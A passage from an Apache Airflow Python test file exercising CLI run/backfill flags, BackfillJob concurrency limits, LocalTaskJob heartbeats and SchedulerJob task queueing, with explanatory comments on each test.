        ignore_first_depends_on_past=True).run()

    # ti should have succeeded
    ti = TI(dag.tasks[0], run_date)
    ti.refresh_from_db()
    # assertEqual, not the deprecated assertEquals alias
    self.assertEqual(ti.state, State.SUCCESS)
def test_run_ignores_all_dependencies(self):
    """
    Test that run respects ignore_all_dependencies

    The ``-A`` CLI flag forces task instances to run regardless of
    upstream/dependency state; the first two runs end FAILED (the tasks
    themselves fail), the third succeeds even though its dependency failed.
    """
    dag_id = 'test_run_ignores_all_dependencies'
    dag = self.dagbag.get_dag('test_run_ignores_all_dependencies')
    dag.clear()

    # dependent task forced to run on its own date: fails on its own
    task0_id = 'test_run_dependent_task'
    args0 = ['run',
             '-A',
             dag_id,
             task0_id,
             DEFAULT_DATE.isoformat()]
    cli.run(self.parser.parse_args(args0))
    ti_dependent0 = TI(
        task=dag.get_task(task0_id),
        execution_date=DEFAULT_DATE)
    ti_dependent0.refresh_from_db()
    self.assertEquals(ti_dependent0.state, State.FAILED)

    # upstream dependency task one day later: also fails
    task1_id = 'test_run_dependency_task'
    args1 = ['run',
             '-A',
             dag_id,
             task1_id,
             (DEFAULT_DATE + datetime.timedelta(days=1)).isoformat()]
    cli.run(self.parser.parse_args(args1))
    ti_dependency = TI(
        task=dag.get_task(task1_id),
        execution_date=DEFAULT_DATE + datetime.timedelta(days=1))
    ti_dependency.refresh_from_db()
    self.assertEquals(ti_dependency.state, State.FAILED)

    # dependent task succeeds despite the failed dependency because -A
    # skips the dependency checks
    task2_id = 'test_run_dependent_task'
    args2 = ['run',
             '-A',
             dag_id,
             task2_id,
             (DEFAULT_DATE + datetime.timedelta(days=1)).isoformat()]
    cli.run(self.parser.parse_args(args2))
    ti_dependent = TI(
        task=dag.get_task(task2_id),
        execution_date=DEFAULT_DATE + datetime.timedelta(days=1))
    ti_dependent.refresh_from_db()
    self.assertEquals(ti_dependent.state, State.SUCCESS)
def test_run_naive_taskinstance(self):
    """
    Test that we can run naive (non-localized) task instances
    """
    # naive datetime: no tzinfo attached
    NAIVE_DATE = datetime.datetime(2016, 1, 1)
    dag_id = 'test_run_ignores_all_dependencies'

    dag = self.dagbag.get_dag('test_run_ignores_all_dependencies')
    dag.clear()

    task0_id = 'test_run_dependent_task'
    args0 = ['run',
             '-A',
             dag_id,
             task0_id,
             NAIVE_DATE.isoformat()]

    cli.run(self.parser.parse_args(args0))
    ti_dependent0 = TI(
        task=dag.get_task(task0_id),
        execution_date=NAIVE_DATE)

    ti_dependent0.refresh_from_db()
    # the run happened (and the task itself fails by design) — the point is
    # that the naive execution date did not blow up the run machinery
    self.assertEquals(ti_dependent0.state, State.FAILED)
def test_cli_backfill_depends_on_past(self):
    """
    Test that CLI respects -I argument

    ``-I`` (ignore_first_depends_on_past) lets a deadlocked backfill of a
    depends_on_past DAG proceed.
    """
    dag_id = 'test_dagrun_states_deadlock'
    run_date = DEFAULT_DATE + datetime.timedelta(days=1)
    args = [
        'backfill',
        dag_id,
        '-l',
        '-s',
        run_date.isoformat(),
    ]
    dag = self.dagbag.get_dag(dag_id)
    dag.clear()

    # without -I the backfill deadlocks on the unmet depends_on_past
    self.assertRaisesRegexp(
        AirflowException,
        'BackfillJob is deadlocked',
        cli.backfill,
        self.parser.parse_args(args))

    cli.backfill(self.parser.parse_args(args + ['-I']))
    ti = TI(dag.get_task('test_depends_on_past'), run_date)
    ti.refresh_from_db()
    # task ran
    self.assertEqual(ti.state, State.SUCCESS)
    dag.clear()
def test_cli_receives_delay_arg(self):
    """
    Tests that the --delay argument is passed correctly to the BackfillJob
    """
    cli_args = [
        'backfill',
        'example_bash_operator',
        '-s',
        DEFAULT_DATE.isoformat(),
        '--delay_on_limit',
        '0.5',
    ]
    parsed = self.parser.parse_args(cli_args)
    # the string "0.5" must come back as the float attribute delay_on_limit
    self.assertEqual(0.5, parsed.delay_on_limit)
def _get_dag_test_max_active_limits(self, dag_id, max_active_runs=1):
    """
    Build a small hourly DAG capped at *max_active_runs* concurrent runs.

    Shape: leave1 -> leave2 -> upstream_level_1 <- upstream_level_2.
    The DAG is cleared before being returned.
    """
    dag = DAG(
        dag_id=dag_id,
        start_date=DEFAULT_DATE,
        schedule_interval="@hourly",
        max_active_runs=max_active_runs,
    )

    with dag:
        leave1 = DummyOperator(task_id='leave1')
        leave2 = DummyOperator(task_id='leave2')
        level1 = DummyOperator(task_id='upstream_level_1')
        level2 = DummyOperator(task_id='upstream_level_2')

        # same dependencies as op1 >> op2 >> op3 and op4 >> op3
        leave1.set_downstream(leave2)
        leave2.set_downstream(level1)
        level2.set_downstream(level1)

    dag.clear()
    return dag
def test_backfill_max_limit_check_within_limit(self):
    """
    With max_active_runs well above the number of backfilled runs, the
    backfill completes all dag runs successfully in one go.
    """
    dag = self._get_dag_test_max_active_limits(
        'test_backfill_max_limit_check_within_limit',
        max_active_runs=16)

    start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
    end_date = DEFAULT_DATE

    executor = TestExecutor(do_update=True)
    job = BackfillJob(dag=dag,
                      start_date=start_date,
                      end_date=end_date,
                      executor=executor,
                      donot_pickle=True)
    job.run()

    # hourly schedule over a 1-hour window -> 2 dag runs, all SUCCESS
    dagruns = DagRun.find(dag_id=dag.dag_id)
    self.assertEqual(2, len(dagruns))
    self.assertTrue(all([run.state == State.SUCCESS for run in dagruns]))
def test_backfill_max_limit_check(self):
    """
    A backfill must wait while max_active_runs is exhausted by an existing
    (out-of-range) RUNNING dag run, and resume once that run completes.

    The backfill runs in a helper thread; the main thread observes it
    blocking, then releases it by marking the pre-existing run SUCCESS.
    """
    dag_id = 'test_backfill_max_limit_check'
    run_id = 'test_dagrun'
    start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
    end_date = DEFAULT_DATE

    # used to hand off "the blocking dag run exists now" to the main thread
    dag_run_created_cond = threading.Condition()

    def run_backfill(cond):
        cond.acquire()
        try:
            dag = self._get_dag_test_max_active_limits(dag_id)

            # this session object is different than the one in the main thread
            thread_session = settings.Session()

            # Existing dagrun that is not within the backfill range
            dag.create_dagrun(
                run_id=run_id,
                state=State.RUNNING,
                execution_date=DEFAULT_DATE + datetime.timedelta(hours=1),
                start_date=DEFAULT_DATE,
            )
            thread_session.commit()
            cond.notify()
        finally:
            cond.release()

        executor = TestExecutor(do_update=True)
        job = BackfillJob(dag=dag,
                          start_date=start_date,
                          end_date=end_date,
                          executor=executor,
                          donot_pickle=True)
        # blocks until the main thread frees a dag-run slot
        job.run()
        thread_session.close()

    backfill_job_thread = threading.Thread(target=run_backfill,
                                           name="run_backfill",
                                           args=(dag_run_created_cond,))

    dag_run_created_cond.acquire()
    session = settings.Session()
    backfill_job_thread.start()
    try:
        # at this point backfill can't run since the max_active_runs has been
        # reached, so it is waiting
        dag_run_created_cond.wait(timeout=1.5)
        dagruns = DagRun.find(dag_id=dag_id)
        dr = dagruns[0]
        # only the pre-existing blocking run exists so far
        self.assertEqual(1, len(dagruns))
        self.assertEqual(dr.run_id, run_id)

        # allow the backfill to execute by setting the existing dag run to SUCCESS,
        # backfill will execute dag runs 1 by 1
        dr.set_state(State.SUCCESS)
        session.merge(dr)
        session.commit()
        session.close()

        backfill_job_thread.join()

        dagruns = DagRun.find(dag_id=dag_id)
        self.assertEqual(3, len(dagruns))  # 2 from backfill + 1 existing
        self.assertEqual(dagruns[-1].run_id, dr.run_id)
    finally:
        dag_run_created_cond.release()
def test_backfill_max_limit_check_no_count_existing(self):
    """
    An existing dag run INSIDE the backfill window must not count against
    max_active_runs; the backfill picks it up and completes it.
    """
    dag = self._get_dag_test_max_active_limits(
        'test_backfill_max_limit_check_no_count_existing')
    start_date = DEFAULT_DATE
    end_date = DEFAULT_DATE

    # Existing dagrun that is within the backfill range
    dag.create_dagrun(run_id="test_existing_backfill",
                      state=State.RUNNING,
                      execution_date=DEFAULT_DATE,
                      start_date=DEFAULT_DATE)

    executor = TestExecutor(do_update=True)
    job = BackfillJob(dag=dag,
                      start_date=start_date,
                      end_date=end_date,
                      executor=executor,
                      donot_pickle=True)
    job.run()

    # BackfillJob will run since the existing DagRun does not count for the max
    # active limit since it's within the backfill date range.
    dagruns = DagRun.find(dag_id=dag.dag_id)
    # will only be able to run 1 (the existing one) since there's just
    # one dag run slot left given the max_active_runs limit
    self.assertEqual(1, len(dagruns))
    self.assertEqual(State.SUCCESS, dagruns[0].state)
def test_backfill_max_limit_check_complete_loop(self):
    """
    With max_active_runs=1, a multi-run backfill must loop internally,
    completing the dag runs one at a time until all are SUCCESS.
    """
    dag = self._get_dag_test_max_active_limits(
        'test_backfill_max_limit_check_complete_loop')
    start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
    end_date = DEFAULT_DATE

    # Given the max limit of 1 active dag run, the backfill must process
    # its 2 hourly runs sequentially rather than concurrently
    success_expected = 2
    executor = TestExecutor(do_update=True)
    job = BackfillJob(dag=dag,
                      start_date=start_date,
                      end_date=end_date,
                      executor=executor,
                      donot_pickle=True)
    job.run()

    success_dagruns = len(DagRun.find(dag_id=dag.dag_id, state=State.SUCCESS))
    running_dagruns = len(DagRun.find(dag_id=dag.dag_id, state=State.RUNNING))
    self.assertEqual(success_expected, success_dagruns)
    self.assertEqual(0, running_dagruns)  # no dag_runs in running state are left
def test_sub_set_subdag(self):
    """
    Backfilling a sub_dag slice (tasks matching 'leave*') re-creates the
    dag run under a backfill run_id and only runs the selected tasks.
    """
    dag = DAG(
        'test_sub_set_subdag',
        start_date=DEFAULT_DATE,
        default_args={'owner': 'owner1'})

    with dag:
        op1 = DummyOperator(task_id='leave1')
        op2 = DummyOperator(task_id='leave2')
        op3 = DummyOperator(task_id='upstream_level_1')
        op4 = DummyOperator(task_id='upstream_level_2')
        op5 = DummyOperator(task_id='upstream_level_3')
        # order randomly
        op2.set_downstream(op3)
        op1.set_downstream(op3)
        op4.set_downstream(op5)
        op3.set_downstream(op4)

    dag.clear()
    dr = dag.create_dagrun(run_id="test",
                           state=State.RUNNING,
                           execution_date=DEFAULT_DATE,
                           start_date=DEFAULT_DATE)

    executor = TestExecutor(do_update=True)
    sub_dag = dag.sub_dag(task_regex="leave*",
                          include_downstream=False,
                          include_upstream=False)
    job = BackfillJob(dag=sub_dag,
                      start_date=DEFAULT_DATE,
                      end_date=DEFAULT_DATE,
                      executor=executor)
    job.run()

    self.assertRaises(sqlalchemy.orm.exc.NoResultFound, dr.refresh_from_db)
    # the run_id should have changed, so a refresh won't work
    drs = DagRun.find(dag_id=dag.dag_id, execution_date=DEFAULT_DATE)
    dr = drs[0]

    self.assertEqual(BackfillJob.ID_FORMAT_PREFIX.format(DEFAULT_DATE.isoformat()),
                     dr.run_id)
    for ti in dr.get_task_instances():
        # only the 'leave*' tasks were part of the sub_dag backfill
        if ti.task_id == 'leave1' or ti.task_id == 'leave2':
            self.assertEqual(State.SUCCESS, ti.state)
        else:
            self.assertEqual(State.NONE, ti.state)
def test_backfill_fill_blanks(self):
    """
    Backfill over a dag run with task instances in assorted states:
    unfinished/blank TIs (UP_FOR_RETRY, SCHEDULED, None) get executed to
    SUCCESS, while terminal states (FAILED, SKIPPED, UPSTREAM_FAILED) are
    left as-is and the overall run ends FAILED.
    """
    dag = DAG(
        'test_backfill_fill_blanks',
        start_date=DEFAULT_DATE,
        default_args={'owner': 'owner1'},
    )

    with dag:
        op1 = DummyOperator(task_id='op1')
        op2 = DummyOperator(task_id='op2')
        op3 = DummyOperator(task_id='op3')
        op4 = DummyOperator(task_id='op4')
        op5 = DummyOperator(task_id='op5')
        op6 = DummyOperator(task_id='op6')

    dag.clear()
    dr = dag.create_dagrun(run_id='test',
                           state=State.RUNNING,
                           execution_date=DEFAULT_DATE,
                           start_date=DEFAULT_DATE)

    executor = TestExecutor(do_update=True)

    session = settings.Session()

    # seed each TI with a distinct starting state
    tis = dr.get_task_instances()
    for ti in tis:
        if ti.task_id == op1.task_id:
            ti.state = State.UP_FOR_RETRY
            ti.end_date = DEFAULT_DATE
        elif ti.task_id == op2.task_id:
            ti.state = State.FAILED
        elif ti.task_id == op3.task_id:
            ti.state = State.SKIPPED
        elif ti.task_id == op4.task_id:
            ti.state = State.SCHEDULED
        elif ti.task_id == op5.task_id:
            ti.state = State.UPSTREAM_FAILED
        # op6 = None
        session.merge(ti)
    session.commit()
    session.close()

    job = BackfillJob(dag=dag,
                      start_date=DEFAULT_DATE,
                      end_date=DEFAULT_DATE,
                      executor=executor)
    self.assertRaisesRegexp(
        AirflowException,
        'Some task instances failed',
        job.run)

    self.assertRaises(sqlalchemy.orm.exc.NoResultFound, dr.refresh_from_db)
    # the run_id should have changed, so a refresh won't work
    drs = DagRun.find(dag_id=dag.dag_id, execution_date=DEFAULT_DATE)
    dr = drs[0]

    self.assertEqual(dr.state, State.FAILED)

    tis = dr.get_task_instances()
    for ti in tis:
        # blanks (op1, op4, op6) were run; terminal states untouched
        if ti.task_id in (op1.task_id, op4.task_id, op6.task_id):
            self.assertEqual(ti.state, State.SUCCESS)
        elif ti.task_id == op2.task_id:
            self.assertEqual(ti.state, State.FAILED)
        elif ti.task_id == op3.task_id:
            self.assertEqual(ti.state, State.SKIPPED)
        elif ti.task_id == op5.task_id:
            self.assertEqual(ti.state, State.UPSTREAM_FAILED)
def test_backfill_execute_subdag(self):
    """
    Backfill a subdag directly and verify all of its task instances are
    handed to the executor in the first scheduling loop.
    """
    dag = self.dagbag.get_dag('example_subdag_operator')
    subdag_op_task = dag.get_task('section-1')

    subdag = subdag_op_task.subdag
    subdag.schedule_interval = '@daily'

    start_date = timezone.utcnow()
    executor = TestExecutor(do_update=True)
    job = BackfillJob(dag=subdag,
                      start_date=start_date,
                      end_date=start_date,
                      executor=executor,
                      donot_pickle=True)
    job.run()

    history = executor.history
    subdag_history = history[0]

    # check that all 5 task instances of the subdag 'section-1' were executed
    self.assertEqual(5, len(subdag_history))
    for sdh in subdag_history:
        ti = sdh[3]
        self.assertIn('section-1-task-', ti.task_id)

    subdag.clear()
    dag.clear()
def test_backfill_execute_subdag_with_removed_task(self):
    """
    Ensure that subdag operators execute properly in the case where
    an associated task of the subdag has been removed from the dag
    definition, but has instances in the database from previous runs.
    """
    dag = self.dagbag.get_dag('example_subdag_operator')
    subdag = dag.get_task('section-1').subdag

    executor = TestExecutor(do_update=True)
    job = BackfillJob(dag=subdag,
                      start_date=DEFAULT_DATE,
                      end_date=DEFAULT_DATE,
                      executor=executor,
                      donot_pickle=True)

    # plant a stale TI whose task no longer exists in the subdag definition
    removed_task_ti = TI(
        task=DummyOperator(task_id='removed_task'),
        execution_date=DEFAULT_DATE,
        state=State.REMOVED)
    removed_task_ti.dag_id = subdag.dag_id

    session = settings.Session()
    session.merge(removed_task_ti)

    with timeout(seconds=30):
        job.run()

    for task in subdag.tasks:
        instance = session.query(TI).filter(
            TI.dag_id == subdag.dag_id,
            TI.task_id == task.task_id,
            TI.execution_date == DEFAULT_DATE).first()

        self.assertIsNotNone(instance)
        self.assertEqual(instance.state, State.SUCCESS)

    # the stale TI must be left in REMOVED, not resurrected by the backfill
    removed_task_ti.refresh_from_db()
    self.assertEqual(removed_task_ti.state, State.REMOVED)

    subdag.clear()
    dag.clear()
def test_update_counters(self):
    """
    BackfillJob._update_counters must move a running TI into the bucket
    matching its state: succeeded, skipped, failed, or (for None state)
    back into to_run.
    """
    dag = DAG(
        dag_id='test_manage_executor_state',
        start_date=DEFAULT_DATE)

    task1 = DummyOperator(
        task_id='dummy',
        dag=dag,
        owner='airflow')

    job = BackfillJob(dag=dag)

    session = settings.Session()
    dr = dag.create_dagrun(run_id=DagRun.ID_PREFIX,
                           state=State.RUNNING,
                           execution_date=DEFAULT_DATE,
                           start_date=DEFAULT_DATE,
                           session=session)
    ti = TI(task1, dr.execution_date)
    ti.refresh_from_db()

    ti_status = BackfillJob._DagRunTaskStatus()

    # test for success
    ti.set_state(State.SUCCESS, session)
    ti_status.running[ti.key] = ti
    job._update_counters(ti_status=ti_status)
    self.assertTrue(len(ti_status.running) == 0)
    self.assertTrue(len(ti_status.succeeded) == 1)
    self.assertTrue(len(ti_status.skipped) == 0)
    self.assertTrue(len(ti_status.failed) == 0)
    self.assertTrue(len(ti_status.to_run) == 0)

    ti_status.succeeded.clear()

    # test for skipped
    ti.set_state(State.SKIPPED, session)
    ti_status.running[ti.key] = ti
    job._update_counters(ti_status=ti_status)
    self.assertTrue(len(ti_status.running) == 0)
    self.assertTrue(len(ti_status.succeeded) == 0)
    self.assertTrue(len(ti_status.skipped) == 1)
    self.assertTrue(len(ti_status.failed) == 0)
    self.assertTrue(len(ti_status.to_run) == 0)

    ti_status.skipped.clear()

    # test for failed
    ti.set_state(State.FAILED, session)
    ti_status.running[ti.key] = ti
    job._update_counters(ti_status=ti_status)
    self.assertTrue(len(ti_status.running) == 0)
    self.assertTrue(len(ti_status.succeeded) == 0)
    self.assertTrue(len(ti_status.skipped) == 0)
    self.assertTrue(len(ti_status.failed) == 1)
    self.assertTrue(len(ti_status.to_run) == 0)

    ti_status.failed.clear()

    # test for reschedule: a TI whose state reverted to None is queued
    # again rather than counted as finished
    ti.set_state(State.NONE, session)
    ti_status.running[ti.key] = ti
    job._update_counters(ti_status=ti_status)
    self.assertTrue(len(ti_status.running) == 0)
    self.assertTrue(len(ti_status.succeeded) == 0)
    self.assertTrue(len(ti_status.skipped) == 0)
    self.assertTrue(len(ti_status.failed) == 0)
    self.assertTrue(len(ti_status.to_run) == 1)

    session.close()
def test_dag_get_run_dates(self):
    """
    DAG.get_run_dates: with no schedule only the start date is returned;
    with an hourly schedule every hour in the window is returned.
    """

    def get_test_dag_for_backfill(schedule_interval=None):
        # minimal single-task DAG for exercising get_run_dates
        dag = DAG(
            dag_id='test_get_dates',
            start_date=DEFAULT_DATE,
            schedule_interval=schedule_interval)
        DummyOperator(
            task_id='dummy',
            dag=dag,
            owner='airflow')
        return dag

    test_dag = get_test_dag_for_backfill()
    self.assertEqual([DEFAULT_DATE], test_dag.get_run_dates(
        start_date=DEFAULT_DATE,
        end_date=DEFAULT_DATE))

    test_dag = get_test_dag_for_backfill(schedule_interval="@hourly")
    self.assertEqual([DEFAULT_DATE - datetime.timedelta(hours=3),
                      DEFAULT_DATE - datetime.timedelta(hours=2),
                      DEFAULT_DATE - datetime.timedelta(hours=1),
                      DEFAULT_DATE],
                     test_dag.get_run_dates(
                         start_date=DEFAULT_DATE - datetime.timedelta(hours=3),
                         end_date=DEFAULT_DATE,))
class LocalTaskJobTest(unittest.TestCase):
    """Tests for LocalTaskJob: heartbeat validation, mark-success handling,
    and double-trigger protection."""

    def setUp(self):
        pass

    @patch('os.getpid')
    def test_localtaskjob_heartbeat(self, mock_pid):
        """
        heartbeat_callback must raise when the recorded hostname or pid do
        not match the current process, and pass when they do.
        """
        session = settings.Session()
        dag = DAG(
            'test_localtaskjob_heartbeat',
            start_date=DEFAULT_DATE,
            default_args={'owner': 'owner1'})

        with dag:
            op1 = DummyOperator(task_id='op1')

        dag.clear()
        dr = dag.create_dagrun(run_id="test",
                               state=State.SUCCESS,
                               execution_date=DEFAULT_DATE,
                               start_date=DEFAULT_DATE,
                               session=session)
        ti = dr.get_task_instance(task_id=op1.task_id, session=session)
        ti.state = State.RUNNING
        # hostname mismatch -> heartbeat must fail
        ti.hostname = "blablabla"
        session.commit()

        job1 = LocalTaskJob(task_instance=ti,
                            ignore_ti_state=True,
                            executor=SequentialExecutor())
        self.assertRaises(AirflowException, job1.heartbeat_callback)

        # matching hostname and pid -> heartbeat passes
        mock_pid.return_value = 1
        ti.state = State.RUNNING
        ti.hostname = get_hostname()
        ti.pid = 1
        session.merge(ti)
        session.commit()

        ret = job1.heartbeat_callback()
        self.assertEqual(ret, None)

        # pid mismatch -> heartbeat must fail again
        mock_pid.return_value = 2
        self.assertRaises(AirflowException, job1.heartbeat_callback)

    def test_mark_success_no_kill(self):
        """
        Test that ensures that mark_success in the UI doesn't cause
        the task to fail, and that the task exits
        """
        dagbag = models.DagBag(
            dag_folder=TEST_DAG_FOLDER,
            include_examples=False,
        )
        dag = dagbag.dags.get('test_mark_success')
        task = dag.get_task('task1')

        session = settings.Session()

        dag.clear()
        dag.create_dagrun(run_id="test",
                          state=State.RUNNING,
                          execution_date=DEFAULT_DATE,
                          start_date=DEFAULT_DATE,
                          session=session)
        ti = TI(task=task, execution_date=DEFAULT_DATE)
        ti.refresh_from_db()
        job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True)
        # run the job in a separate process so we can flip the TI state
        # out from under it
        process = multiprocessing.Process(target=job1.run)
        process.start()
        ti.refresh_from_db()
        # poll (up to ~5s) until the task actually starts running
        for i in range(0, 50):
            if ti.state == State.RUNNING:
                break
            time.sleep(0.1)
            ti.refresh_from_db()
        self.assertEqual(State.RUNNING, ti.state)
        # simulate the UI marking the task successful mid-run
        ti.state = State.SUCCESS
        session.merge(ti)
        session.commit()

        process.join(timeout=10)
        self.assertFalse(process.is_alive())
        ti.refresh_from_db()
        self.assertEqual(State.SUCCESS, ti.state)

    def test_localtaskjob_double_trigger(self):
        """
        A LocalTaskJob for a TI that is already RUNNING elsewhere must not
        start the task runner or alter the TI's recorded pid/state.
        """
        dagbag = models.DagBag(
            dag_folder=TEST_DAG_FOLDER,
            include_examples=False,
        )
        dag = dagbag.dags.get('test_localtaskjob_double_trigger')
        task = dag.get_task('test_localtaskjob_double_trigger_task')

        session = settings.Session()

        dag.clear()
        dr = dag.create_dagrun(run_id="test",
                               state=State.SUCCESS,
                               execution_date=DEFAULT_DATE,
                               start_date=DEFAULT_DATE,
                               session=session)
        # pretend another host/process already runs this TI
        ti = dr.get_task_instance(task_id=task.task_id, session=session)
        ti.state = State.RUNNING
        ti.hostname = get_hostname()
        ti.pid = 1
        session.commit()

        ti_run = TI(task=task, execution_date=DEFAULT_DATE)
        job1 = LocalTaskJob(task_instance=ti_run,
                            ignore_ti_state=True,
                            executor=SequentialExecutor())
        with patch.object(BaseTaskRunner, 'start', return_value=None) as mock_method:
            job1.run()
            mock_method.assert_not_called()

        ti = dr.get_task_instance(task_id=task.task_id, session=session)
        self.assertEqual(ti.pid, 1)
        self.assertEqual(ti.state, State.RUNNING)

        session.close()
class SchedulerJobTest(unittest.TestCase):
    # Tests for SchedulerJob scheduling/queueing behaviour (class continues
    # below with the individual test methods).

    def setUp(self):
        """Load the DagBag and purge DagRun/ImportError rows so every test
        starts against a clean metadata DB."""
        self.dagbag = DagBag()
        session = settings.Session()
        session.query(models.DagRun).delete()
        session.query(models.ImportError).delete()
        session.commit()
@staticmethod
def run_single_scheduler_loop_with_no_dags(dags_folder):
    """
    Utility function that runs a single scheduler loop without actually
    changing/scheduling any dags. This is useful to simulate the other side effects of
    running a scheduler loop, e.g. to see what parse errors there are in the
    dags_folder.

    :param dags_folder: the directory to traverse
    :type dags_folder: str
    """
    scheduler = SchedulerJob(
        dag_id='this_dag_doesnt_exist',  # We don't want to actually run anything
        num_runs=1,
        subdir=os.path.join(dags_folder))
    scheduler.heartrate = 0
    scheduler.run()
def _make_simple_dag_bag(self, dags):
    """Wrap each DAG in a SimpleDag and bundle them into a SimpleDagBag."""
    simple_dags = [SimpleDag(d) for d in dags]
    return SimpleDagBag(simple_dags)
def test_process_executor_events(self):
    """
    _process_executor_events must only apply executor state changes for
    TIs whose dag is present in the given simple dag bag.
    """
    dag_id = "test_process_executor_events"
    dag_id2 = "test_process_executor_events_2"
    task_id_1 = 'dummy_task'

    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
    dag2 = DAG(dag_id=dag_id2, start_date=DEFAULT_DATE)
    task1 = DummyOperator(dag=dag, task_id=task_id_1)
    task2 = DummyOperator(dag=dag2, task_id=task_id_1)

    dagbag1 = self._make_simple_dag_bag([dag])
    dagbag2 = self._make_simple_dag_bag([dag2])

    scheduler = SchedulerJob()
    session = settings.Session()

    ti1 = TI(task1, DEFAULT_DATE)
    ti1.state = State.QUEUED
    session.merge(ti1)
    session.commit()

    executor = TestExecutor()
    executor.event_buffer[ti1.key] = State.FAILED

    scheduler.executor = executor

    # dag bag does not contain dag_id
    scheduler._process_executor_events(simple_dag_bag=dagbag2)
    ti1.refresh_from_db()
    self.assertEqual(ti1.state, State.QUEUED)

    # dag bag does contain dag_id
    scheduler._process_executor_events(simple_dag_bag=dagbag1)
    ti1.refresh_from_db()
    self.assertEqual(ti1.state, State.FAILED)

    # a SUCCESS event is applied the same way
    ti1.state = State.SUCCESS
    session.merge(ti1)
    session.commit()
    executor.event_buffer[ti1.key] = State.SUCCESS

    scheduler._process_executor_events(simple_dag_bag=dagbag1)
    ti1.refresh_from_db()
    self.assertEqual(ti1.state, State.SUCCESS)
def test_execute_task_instances_is_paused_wont_execute(self):
    """
    Scheduled TIs belonging to a paused dag must not be queued.
    """
    dag_id = 'SchedulerJobTest.test_execute_task_instances_is_paused_wont_execute'
    task_id_1 = 'dummy_task'

    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
    task1 = DummyOperator(dag=dag, task_id=task_id_1)
    dagbag = self._make_simple_dag_bag([dag])

    scheduler = SchedulerJob()
    session = settings.Session()

    dr1 = scheduler.create_dag_run(dag)
    ti1 = TI(task1, DEFAULT_DATE)
    ti1.state = State.SCHEDULED
    dr1.state = State.RUNNING
    # mark the dag paused via its DagModel row
    dagmodel = models.DagModel()
    dagmodel.dag_id = dag_id
    dagmodel.is_paused = True
    session.merge(ti1)
    session.merge(dr1)
    session.add(dagmodel)
    session.commit()

    scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
    ti1.refresh_from_db()
    # state unchanged: the paused dag was skipped
    self.assertEquals(State.SCHEDULED, ti1.state)
def test_execute_task_instances_no_dagrun_task_will_execute(self):
    """
    Tests that tasks without dagrun still get executed.
    """
    dag_id = 'SchedulerJobTest.test_execute_task_instances_no_dagrun_task_will_execute'
    task_id_1 = 'dummy_task'

    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
    task1 = DummyOperator(dag=dag, task_id=task_id_1)
    dagbag = self._make_simple_dag_bag([dag])

    scheduler = SchedulerJob()
    session = settings.Session()

    scheduler.create_dag_run(dag)
    ti1 = TI(task1, DEFAULT_DATE)
    ti1.state = State.SCHEDULED
    # shift the TI one day past the created dag run so no run matches it
    ti1.execution_date = ti1.execution_date + datetime.timedelta(days=1)
    session.merge(ti1)
    session.commit()

    scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
    ti1.refresh_from_db()
    self.assertEquals(State.QUEUED, ti1.state)
def test_execute_task_instances_backfill_tasks_wont_execute(self):
    """
    Tests that backfill tasks won't get executed.
    """
    dag_id = 'SchedulerJobTest.test_execute_task_instances_backfill_tasks_wont_execute'
    task_id_1 = 'dummy_task'

    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
    task1 = DummyOperator(dag=dag, task_id=task_id_1)
    dagbag = self._make_simple_dag_bag([dag])

    scheduler = SchedulerJob()
    session = settings.Session()

    # a run_id with the backfill prefix marks the run as a backfill run
    dr1 = scheduler.create_dag_run(dag)
    dr1.run_id = BackfillJob.ID_PREFIX + '_blah'

    ti1 = TI(task1, dr1.execution_date)
    ti1.refresh_from_db()
    ti1.state = State.SCHEDULED
    session.merge(ti1)
    session.merge(dr1)
    session.commit()

    self.assertTrue(dr1.is_backfill)

    scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
    ti1.refresh_from_db()
    # still SCHEDULED: the scheduler leaves backfill runs alone
    self.assertEquals(State.SCHEDULED, ti1.state)
def test_find_executable_task_instances_backfill_nodagrun(self):
    """
    _find_executable_task_instances must return scheduled TIs with no dag
    run and TIs of regular dag runs, but exclude TIs of backfill runs.
    """
    dag_id = 'SchedulerJobTest.test_find_executable_task_instances_backfill_nodagrun'
    task_id_1 = 'dummy'
    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
    task1 = DummyOperator(dag=dag, task_id=task_id_1)
    dagbag = self._make_simple_dag_bag([dag])

    scheduler = SchedulerJob()
    session = settings.Session()

    dr1 = scheduler.create_dag_run(dag)
    dr2 = scheduler.create_dag_run(dag)
    # tag the second run as a backfill run
    dr2.run_id = BackfillJob.ID_PREFIX + 'asdf'

    ti_no_dagrun = TI(task1, DEFAULT_DATE - datetime.timedelta(days=1))
    ti_backfill = TI(task1, dr2.execution_date)
    ti_with_dagrun = TI(task1, dr1.execution_date)
    # ti_with_paused
    ti_no_dagrun.state = State.SCHEDULED
    ti_backfill.state = State.SCHEDULED
    ti_with_dagrun.state = State.SCHEDULED

    session.merge(dr2)
    session.merge(ti_no_dagrun)
    session.merge(ti_backfill)
    session.merge(ti_with_dagrun)
    session.commit()

    res = scheduler._find_executable_task_instances(
        dagbag,
        states=[State.SCHEDULED],
        session=session)

    self.assertEqual(2, len(res))
    # materialize a list: a map() object is a one-shot iterator on
    # Python 3, so performing two membership tests on it is unreliable
    res_keys = [ti.key for ti in res]
    self.assertIn(ti_no_dagrun.key, res_keys)
    self.assertIn(ti_with_dagrun.key, res_keys)
def test_find_executable_task_instances_pool(self):
    """
    _find_executable_task_instances must respect pool slots: pool 'a' has
    1 slot so only one of its two TIs is returned; pool 'b' has plenty.
    """
    dag_id = 'SchedulerJobTest.test_find_executable_task_instances_pool'
    task_id_1 = 'dummy'
    task_id_2 = 'dummydummy'
    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
    task1 = DummyOperator(dag=dag, task_id=task_id_1, pool='a')
    task2 = DummyOperator(dag=dag, task_id=task_id_2, pool='b')
    dagbag = self._make_simple_dag_bag([dag])

    scheduler = SchedulerJob()
    session = settings.Session()

    dr1 = scheduler.create_dag_run(dag)
    dr2 = scheduler.create_dag_run(dag)

    tis = ([
        TI(task1, dr1.execution_date),
        TI(task2, dr1.execution_date),
